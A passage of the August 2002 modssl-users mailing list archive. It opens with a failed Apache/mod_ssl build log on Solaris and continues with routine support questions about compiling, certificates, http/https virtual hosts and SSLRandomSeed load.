gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -
DNO_DL_NEEDED `../apaci` ap_slack.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -
DNO_DL_NEEDED `../apaci` ap_snprintf.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -
DNO_DL_NEEDED `../apaci` ap_sha1.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -
DNO_DL_NEEDED `../apaci` ap_checkpass.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -
DNO_DL_NEEDED `../apaci` ap_base64.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -
DNO_DL_NEEDED `../apaci` ap_ebcdic.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -
DNO_DL_NEEDED `../apaci` ap_strtol.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -
DNO_DL_NEEDED `../apaci` ap_hook.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -
DNO_DL_NEEDED `../apaci` ap_ctx.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -
DNO_DL_NEEDED `../apaci` ap_mm.c
rm -f libap.a
ar cr libap.a ap_cpystrn.o ap_execve.o ap_fnmatch.o ap_getpass.o ap_md5c.o
ap_signal.o ap_slack.o ap_snprintf.o ap_sha1.o
ap_checkpass.o ap_base64.o ap_ebcdic.o ap_strtol.o ap_hook.o ap_ctx.o
ap_mm.o
ranlib libap.a
<=== src/ap
===> src/main
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -
DNO_DL_NEEDED `../apaci` gen_test_char.c
gcc  -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -DNO_DL_NEEDED
`../apaci` -L/home/i70815/openssl-0.9.6g  -o gen_test_char
gen_test_char.o  -lsocket -lnsl -lpthread  -lssl -lcrypto -lexpat
./gen_test_char >test_char.h
ld.so.1: ./gen_test_char: fatal: libexpat.so.0: open failed: No such file or
directory
Killed
make[3]: *** [test_char.h] Error 137
make[2]: *** [subdirs] Error 1
make[2]: Leaving directory `/home/i70815/apache_1.3.26/src'
make[1]: *** [build-std] Error 2
make[1]: Leaving directory `/home/i70815/apache_1.3.26'
make: *** [build] Error 2

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 15 01:11:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA18935; Thu, 15 Aug 2002 01:10:32 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from zipperii.zip.com.au id BAA18930; Thu, 15 Aug 2002 01:10:05 +0200 (MET DST)
Received: (from mlh@localhost)
	by zipperii.zip.com.au (8.9.3/8.9.3) id JAA26938;
	Thu, 15 Aug 2002 09:10:00 +1000
Date: Thu, 15 Aug 2002 09:10:00 +1000
From: Matthew Hannigan 
To: modssl-users@modssl.org
Subject: how sensitive is mod_ssl.c to compiler and OS?
Message-ID: <20020815091000.B26532@zipperii.zip.com.au>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matthew Hannigan 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



I have a number of apache/mod_ssl servers
deployed on solaris2.6, compiled with Sun's
compiler.

My dev environment is solaris8, with later
version of Sun's C compiler.

Can I expect that compiling the latest mod
on sol8 will work on sol2.6?


Just how sensitive is apxs/dso to compiler
and OS version?  I know that sol8 had an
extra library or two that I might need to 
patch sol2.6 with, and I need to check 32/64bit
and cpu type directives; but what else?


What about compiling the module with gcc on
solaris2.6 and loading that in a Sun C compiled
apache?  (since I no longer have a licensed
Sun compiler on a 2.6 machine)


I realise I'm covering a lot of ground here,
(Solaris, Apache, compilers, dynamic loading)

But since mod_ssl is the particular thing I'm
upgrading, I hope this list would have some
ready answers/experiences to share.

Regards
Matt

PS wouldn't it be a nice feature for apxs to
also report the environment (PATH) and other
things that influenced the build of the original
apache and modules?
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 15 02:28:02 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA20202; Thu, 15 Aug 2002 02:26:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from antigonus.hosting.pacbell.net id CAA20196; Thu, 15 Aug 2002 02:25:12 +0200 (MET DST)
Received: from IMRANPC (adsl-67-118-240-18.dsl.pltn13.pacbell.net [67.118.240.18])
	by antigonus.hosting.pacbell.net
	id UAA25748; Wed, 14 Aug 2002 20:25:10 -0400 (EDT)
	[ConcentricHost SMTP Relay 1.14]
From: "Imran Badr" 
To: 
Subject:  modssl 2.8.3-1.3.19 problem
Date: Wed, 14 Aug 2002 17:23:33 -0700
Message-ID: <001d01c243f1$fde5f280$9e10a8c0@IMRANPC>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Imran Badr" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hi,
I am using modssl 2.8.3-1.3.19. I define 14 virtual SSL servers in the
apache config file. If for example, openssl returns an error in SSL_CTX
initialization for or any virtual server then all the previous SSL_CTX
structures are never free'd. Actually nobody calls SSL_CTX_free() for the
previous allocated SSL contexts.

Imran.




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 15 04:32:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA22966; Thu, 15 Aug 2002 04:31:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from itahost1.ita.org.mo id EAA22935; Thu, 15 Aug 2002 04:31:05 +0200 (MET DST)
From: EdwardSPL@ita.org.mo
Received: from ita.org.mo (c50line111.dialup2.ctm.net [202.175.34.112])
	by itahost1.ita.org.mo (8.9.3/8.9.3) with ESMTP id KAA26679
	for ; Thu, 15 Aug 2002 10:14:01 +0800
Message-ID: <3D5B0899.9ABEB8E1@ita.org.mo>
Date: Thu, 15 Aug 2002 09:49:13 +0800
X-Mailer: Mozilla 4.7 [en] (WinNT; I)
X-Accept-Language: en,zh-TW
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: http or https but not both?
References: <002701c243ab$12aecf30$381e848e@uwinnipeg.ca>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: EdwardSPL@ita.org.mo
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

Which version of apache and OpenSSL are you using ?
Would you mind to post your httpd.conf in here for help ?

Paul F wrote:

> I have a fresh linux installation with apache + mod_ssl.
>
> With the mod_ssl module and AddModule uncommented, I can access
> https://mysite..... BUT NOT
> http://mysite.....
>
> Any help appreciated!
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 15 10:06:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA29549; Thu, 15 Aug 2002 10:05:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0a.swx.com id KAA29540; Thu, 15 Aug 2002 10:04:13 +0200 (MET DST)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0a.swx.com (8.9.3+Sun/8.9.3) with ESMTP id KAA07159
	for ; Thu, 15 Aug 2002 10:04:12 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.9.3+Sun/8.9.3) with ESMTP id KAA13790
	for ; Thu, 15 Aug 2002 10:04:12 +0200 (MEST)
X-Authentication-Warning: gate0b.unix.swx.ch: iscan owned process doing -bs
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Subject: RE: http or https but not both?
Date: Thu, 15 Aug 2002 10:04:11 +0200
Message-ID: <14D1193E30E0894D8A773957C0AEE24AAA92AE@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: http or https but not both?
Thread-Index: AcJDq3LZmhljbYpJR4aI1CmfLRmxPwAhn+cA
From: "Boyle Owen" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id KAA29544
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

It sounds like you have misunderstood how to set up the SSL and HTTP sites. Basically, they are two separate port-based virtual hosts... I wrote up some notes on this a few days ago  - check out: http://marc.theaimsgroup.com/?l=apache-modssl&m=102922483406071&w=2

Rgds,

Owen Boyle

>-----Original Message-----
>From: Paul F [mailto:paulf@mts.net]
>Sent: Mittwoch, 14. August 2002 17:56
>To: modssl-users@modssl.org
>Subject: http or https but not both?
>
>
>I have a fresh linux installation with apache + mod_ssl.
>
>With the mod_ssl module and AddModule uncommented, I can access
>https://mysite..... BUT NOT
>http://mysite.....
>
>Any help appreciated!
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 15 12:25:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA03906; Thu, 15 Aug 2002 12:24:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id MAA03896; Thu, 15 Aug 2002 12:24:00 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id D2B084CE693; Thu, 15 Aug 2002 12:23:59 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 8F48128830; Thu, 15 Aug 2002 09:53:00 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from usilms55.ca.com id CAA20398; Thu, 15 Aug 2002 02:32:28 +0200 (MET DST)
Received: from usilms21.ca.com ([141.202.201.21]) by usilms55.ca.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Wed, 14 Aug 2002 20:32:21 -0400
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: How to create a client certificate when use x509?
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Date: Wed, 14 Aug 2002 20:32:21 -0400
Message-ID: <8C6B052884783549B5D30C166853A5140FD60F@usilms21.ca.com>
Thread-Topic:  modssl 2.8.3-1.3.19 problem
Thread-Index: AcJD8tF9IC3BP3PmRem14RjyBZbuBAAAKJIg
From: "Bao, Xiliang" 
To: 
X-OriginalArrivalTime: 15 Aug 2002 00:32:21.0715 (UTC) FILETIME=[381A3230:01C243F3]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id CAA20399
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Bao, Xiliang" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi:

Any one knows how to create client certificates when use x509?
I can create server certificates without any problem. But what 
is the requirments for client certificates? I use Microsoft
windows NT.

Any hint will be appreciated.

Steve 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 15 12:25:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA03909; Thu, 15 Aug 2002 12:24:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id MAA03895; Thu, 15 Aug 2002 12:24:00 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id C358A4CE620; Thu, 15 Aug 2002 12:23:59 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id E1DDF286BA; Thu, 15 Aug 2002 09:52:52 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from antigonus.hosting.pacbell.net id BAA18486; Thu, 15 Aug 2002 01:03:06 +0200 (MET DST)
Received: from IMRANPC (adsl-67-118-240-18.dsl.pltn13.pacbell.net [67.118.240.18])
	by antigonus.hosting.pacbell.net
	id TAA27144; Wed, 14 Aug 2002 19:02:44 -0400 (EDT)
	[ConcentricHost SMTP Relay 1.14]
From: "Imran Badr" 
To: 
Subject: modssl 2.8.3-1.3.19 problem
Date: Wed, 14 Aug 2002 16:01:07 -0700
Message-ID: <001601c243e6$79be7820$9e10a8c0@IMRANPC>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0)
In-Reply-To: 
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Imran Badr" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I am using modssl 2.8.3-1.3.19. I define 14 virtual SSL servers in the
apache config file. If for example, openssl returns an error in SSL_CTX
initialization for 7th (or any) virtual server then all the previous SSL_CTX
structures are not free'd. Nobody calls SSL_CTX_free() for previous
allocated SSL contexts.

Imran.



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 15 17:48:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA14511; Thu, 15 Aug 2002 17:47:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mxbackup.aarboard.ch id RAA14503; Thu, 15 Aug 2002 17:46:33 +0200 (MET DST)
Received: from [127.0.0.1] by mxbackup.relay01.aarboard.ch (NTMail 5.06.0016/NT8408.02.a3c8321a) with ESMTP id gnqtbaaa for modssl-users@modssl.org; Thu, 15 Aug 2002 17:46:28 +0200
Received: from mail3.aarboard.ch ([192.168.200.11])
 by relay01.aarboard.ch (NAVIEG 2.1 bld 76) with SMTP id M2002081517462725427
 for ; Thu, 15 Aug 2002 17:46:27 +0200
Received: from Aarboard-MTA by mail3.aarboard.ch
	with Novell_GroupWise; Thu, 15 Aug 2002 17:46:15 +0200
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.2 Beta
Date: Thu, 15 Aug 2002 17:46:04 +0200
From: "Andre Schild" 
To: 
Subject: RE: Contribution Segment of the ModSSL web site problems
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id RAA14506
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andre Schild" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

>Not sure who is responsible for the web site itself, but there does
seem to
>be a problem.
Yes, there is a problem.

>Has anyone else noticed that the contribution portion of the site is
>malfunctioning? I have tried it with a couple different browsers, and
get
>the same response (it's displaying code for some of the pages)
Everything
>but the contribution portion seems to be working fine.
Does not work with IE 6.x and Mozilla 1.0 either

Seems to be a problem with the index.???? page in this folder.

André
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 15 17:49:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA14525; Thu, 15 Aug 2002 17:48:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mxbackup.aarboard.ch id RAA14514; Thu, 15 Aug 2002 17:47:57 +0200 (MET DST)
Received: from [127.0.0.1] by mxbackup.relay01.aarboard.ch (NTMail 5.06.0016/NT8408.02.a3c8321a) with ESMTP id jnqtbaaa for modssl-users@modssl.org; Thu, 15 Aug 2002 17:47:49 +0200
Received: from mail3.aarboard.ch ([192.168.200.11])
 by relay01.aarboard.ch (NAVIEG 2.1 bld 76) with SMTP id M2002081517474823319
 for ; Thu, 15 Aug 2002 17:47:48 +0200
Received: from Aarboard-MTA by mail3.aarboard.ch
	with Novell_GroupWise; Thu, 15 Aug 2002 17:47:37 +0200
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.2 Beta
Date: Thu, 15 Aug 2002 17:47:16 +0200
From: "Andre Schild" 
To: 
Subject: How to upload to contribute section ?
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id RAB14515
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andre Schild" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

I have binaries for apache 2.0.40 with openssl 0.9.6e.
How can I upload them to the contribution section ?

André
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 15 17:54:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA14707; Thu, 15 Aug 2002 17:53:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id RAA14697; Thu, 15 Aug 2002 17:53:02 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g7FFmKwN020672
	for ; Thu, 15 Aug 2002 11:48:20 -0400
Date: Thu, 15 Aug 2002 11:48:20 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: How to upload to contribute section ?
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, 15 Aug 2002, Andre Schild wrote:

> I have binaries for apache 2.0.40 with openssl 0.9.6e.

For which OS?  Just curious.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 15 18:20:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA15777; Thu, 15 Aug 2002 18:19:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.navitaire.com id SAA15769; Thu, 15 Aug 2002 18:19:00 +0200 (MET DST)
Received: from exchange.Navitaire.com (exch.navitaire.com [149.122.4.14])
	by mail.navitaire.com (Switch-2.1.4/Switch-2.1.0) with ESMTP id g7FGIrp19133
	for ; Thu, 15 Aug 2002 11:18:53 -0500 (CDT)
Received: by exchange.Navitaire.com with Internet Mail Service (5.5.2653.19)
	id ; Thu, 15 Aug 2002 11:18:34 -0500
Message-ID: 
From: "Henning, Brian" 
To: modssl-users@modssl.org
Subject: certificate
Date: Thu, 15 Aug 2002 11:18:29 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Henning, Brian" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello-
I am trying to run a secure webserver Apache2.0.39 on my freebsd 4.5
machine. I am at the point I need to create the certificate. 

so far i have installed Apache2.0.39 and then i tried the following command:

openssl req -config openssl.cnf -new -out my-server.csr
Using configuration from openssl.cnf
error on line 1 of openssl.cnf
52353:error:02001002:system library:fopen:No such file or
directory:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/b
ss_file.c:104:fopen('openssl.cnf','rb')
52353:error:2006D002:BIO routines:BIO_new_file:system
lib:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_fil
e.c:106:
52353:error:0E064002:configuration file routines:CONF_load:system
lib:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/conf/conf_l
ib.c:91:

can someone point out what i am doing wrong?
thanks,
brian
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 16 03:08:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA27172; Fri, 16 Aug 2002 03:07:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from web12902.mail.yahoo.com id DAA27162; Fri, 16 Aug 2002 03:06:05 +0200 (MET DST)
Message-ID: <20020816010604.8330.qmail@web12902.mail.yahoo.com>
Received: from [209.247.163.9] by web12902.mail.yahoo.com via HTTP; Thu, 15 Aug 2002 18:06:04 PDT
Date: Thu, 15 Aug 2002 18:06:04 -0700 (PDT)
From: Joshua Stone 
Subject: Re:SSLRandomSeed connect builtin...
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joshua Stone 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi there,

I've a linux box running -

Apache/1.3.26 (Unix) mod_ssl/2.8.9 OpenSSL/0.9.6d 

The box gets extremely loaded when I have -

...
SSLRandomSeed startup buildin
SSLRandomSeed connect buildin
...

in httpd.conf file. As soon as I change the connect
line with

SSLRandomSeed connect file:/dev/urandom 1024

everything seems fine.

Any idea what is causing the server busy? 

Thanx
-
Jays.

__________________________________________________
Do You Yahoo!?
HotJobs - Search Thousands of New Jobs
http://www.hotjobs.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 16 08:54:50 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA04870; Fri, 16 Aug 2002 08:53:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA04865; Fri, 16 Aug 2002 08:52:37 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 8E3404CE73C; Fri, 16 Aug 2002 08:52:36 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id D1EEC28B3F; Fri, 16 Aug 2002 08:52:29 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from balrog.moria.csun.edu id VAA19322; Thu, 15 Aug 2002 21:01:51 +0200 (MET DST)
From: ulairi@ulairi.org
Received: (qmail 97771 invoked by uid 1003); 15 Aug 2002 19:01:29 -0000
Received: from 130.166.244.5 ( [130.166.244.5])
	as user ulairi@balrog.moria.csun.edu by balrog.moria.csun.edu with HTTP;
	Thu, 15 Aug 2002 12:01:29 -0700
Message-ID: <1029438089.3d5bfa8971ee4@balrog.moria.csun.edu>
Date: Thu, 15 Aug 2002 12:01:29 -0700
To: modssl-users@modssl.org
Subject: Re: certificate
References: 
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
User-Agent: Internet Messaging Program (IMP) 3.0
X-Originating-IP: 130.166.244.5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: ulairi@ulairi.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Quoting "Henning, Brian" :

> Hello-
> I am trying to run a secure webserver Apache2.0.39 on my freebsd 4.5
> machine. I am at the point I need to create the certificate. 
> 
> so far i have installed Apache2.0.39 and then i tried the following command:
> 
> openssl req -config openssl.cnf -new -out my-server.csr
> Using configuration from openssl.cnf
> error on line 1 of openssl.cnf
> 52353:error:02001002:system library:fopen:No such file or
> directory:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/b
> ss_file.c:104:fopen('openssl.cnf','rb')
> 52353:error:2006D002:BIO routines:BIO_new_file:system
> lib:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_fil
> e.c:106:
> 52353:error:0E064002:configuration file routines:CONF_load:system
> lib:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/conf/conf_l
> ib.c:91:
> 
> can someone point out what i am doing wrong?
> thanks,
> brian

Looks like openssl is not finding the openssl.cnf file where it expects to find 
it (or it is unreadable). 
-- 
My other computer is your windows box.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 16 08:55:24 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA04889; Fri, 16 Aug 2002 08:54:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA04884; Fri, 16 Aug 2002 08:54:00 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 9D5324CE754; Fri, 16 Aug 2002 08:53:59 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 2772528AF1; Fri, 16 Aug 2002 08:52:45 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from nis.acs.uci.edu id WAA20874; Thu, 15 Aug 2002 22:16:34 +0200 (MET DST)
Received: from tesuji.nac.uci.edu (tesuji.nac.uci.edu [128.200.34.35]) by nis.acs.uci.edu (8.9.3/) with ESMTP id NAA27991 for ; Thu, 15 Aug 2002 13:16:27 -0700 (PDT)
Received: (from strombrg@localhost) by tesuji.nac.uci.edu (8.9.3/) id NAA13601 for modssl-users@modssl.org; Thu, 15 Aug 2002 13:15:56 -0700
Date: Thu, 15 Aug 2002 13:15:56 -0700
From: Dan Stromberg 
To: modssl-users@modssl.org
Subject: bugdb broken
Message-ID: <20020815131556.O11151@tesuji.nac.uci.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dan Stromberg 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

The FAQ says the bugdb is the preferred way of reporting a bug, however,
the bugdb link just gives a small directory index instead of a useful
bug-submission page.

-- 
Dan Stromberg                                               UCI/NACS/DCS
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 16 08:55:28 2002
